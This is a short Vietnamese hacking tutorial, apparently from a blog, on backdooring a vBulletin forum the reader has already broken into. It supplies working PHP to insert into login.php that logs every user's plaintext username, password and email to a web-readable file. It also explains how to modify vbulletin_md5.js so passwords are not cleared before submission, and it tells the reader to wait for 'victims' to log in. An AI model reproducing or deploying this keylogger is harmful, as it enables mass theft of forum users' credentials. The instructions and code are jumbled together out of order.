Tut:Khi đã có shell trên forum mở file login.php của nó ra tìm đoạn
process_new_login(($_postvars['logintype']Chèn bên dưới
//=== Keyloger vbb4x, fix by anything1712 =================Trong đó $lg_file = "modcp/test.html"; chỉnh lại đường dẫn đến file muốn lưu sau đó tìm file clientscript/vbulletin_md5.js mở nó ra tìm đoạn
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
// The log will be recorded in this file
$lg_file = "modcp/test.html";
$sql_query = @mysql_query("SELECT * FROM `" . TABLE_PREFIX . "user` WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query)) {
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) {
$logfile = @file($lg_file);
$logfile[] = $lg_username . " : " . $lg_password." (" . $row["email"] . ")";
$logfile = array_unique($logfile);
$fp1 = fopen($lg_file, "w");
fwrite($fp1, implode("\r\n", $logfile));
fclose($fp1);
}
break;
}
//==============================
B.value=""Thường là nó nằm ở cuối file
sửa lại thành
B.value=B.valueDone đợi victim đăng nhập và tận hưởng thành quả
Read more: http://www.votam.ug/search/label/Hacking-Security#ixzz3obKILKxx
Đăng nhận xét